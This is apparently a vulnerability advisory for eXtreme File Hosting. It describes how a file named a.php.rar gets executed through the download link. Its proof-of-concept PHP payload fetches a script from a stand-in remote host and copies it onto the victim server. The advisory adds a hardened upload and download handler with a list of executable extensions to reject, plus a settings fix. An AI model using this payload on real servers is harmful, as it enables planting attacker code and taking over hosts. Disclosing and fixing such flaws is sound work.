
eXtreme File Hosting remote file upload vulnerability






A security bug has been discovered in eXtreme File Hosting which lets an attacker upload arbitrary files and obtain a shell with phpshell.

Bug: this PHP application lets users upload zip or rar files, so an attacker can upload a file named a.php.rar that contains:

###########################
<?php
// Contents of a.php.rar as described in this advisory: when the download link
// runs the file as PHP, it fetches a remote script and copies it onto the host.
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
} else {
   echo "OK file copy in victim host";
}
?>
###########################

After uploading it, the attacker clicks the download link; the file is then executed instead of being downloaded.
Once a.php.rar runs, evile_file.php is copied onto the victim host and the attacker can use it to attack the server.
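The root cause is that the upload check looks only at the final extension and the download link hands the stored file to the PHP interpreter. A hardened upload and download handler, added here as an example and not taken from eXtreme File Hosting's code; UPLOAD_DIR, the `$_FILES['upload']` field name and the function names are assumptions. It rejects the double-extension name a.php.rar, stores archives outside the web root under an opaque name, and streams them back with readfile() instead of executing them.

```php
<?php
// Added hardening example, not part of eXtreme File Hosting.
// Assumes UPLOAD_DIR is a directory the web server does not serve or execute from.
const UPLOAD_DIR = '/var/uploads';   // assumed path
const ALLOWED_EXT = ['zip', 'rar'];
const EXECUTABLE_EXT = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl'];

// Stores an uploaded archive and returns its opaque stored name; throws on any violation.
function storeArchive(array $f): string {
    if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }
    // Split the client-supplied name on every dot: "a.php.rar" -> ["a", "php", "rar"].
    $parts = explode('.', strtolower(basename($f['name'])));
    $ext = array_pop($parts);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('extension not allowed');
    }
    // Double-extension check: no inner segment may be something the server executes.
    foreach ($parts as $segment) {
        if (in_array($segment, EXECUTABLE_EXT, true)) {
            throw new RuntimeException('executable extension inside file name');
        }
    }
    // Never reuse the client name: store under a random name with the vetted extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($f['tmp_name'], UPLOAD_DIR . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}

// Serves a stored archive as a download: bytes are streamed, never included or executed.
function sendArchive(string $stored): void {
    // Only names produced by storeArchive() are accepted, so no path traversal is possible.
    if (!preg_match('/^[0-9a-f]{32}\.(zip|rar)$/', $stored)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $stored;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $stored . '"');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}
```

Wire `storeArchive($_FILES['upload'])` into the upload form and `sendArchive($_GET['f'])` into the download link; the directory-level fix (no PHP handler for the upload directory) still applies on top of this.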


Solution: disable rar file uploading in the settings.
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Software: eXtreme File Hosting
Site: http://www.extremepow.com
Reported By: hamed bazargani (hamed.bazargani@gmail.com) from I.R.IRAN and all Iranian whitehat hackers
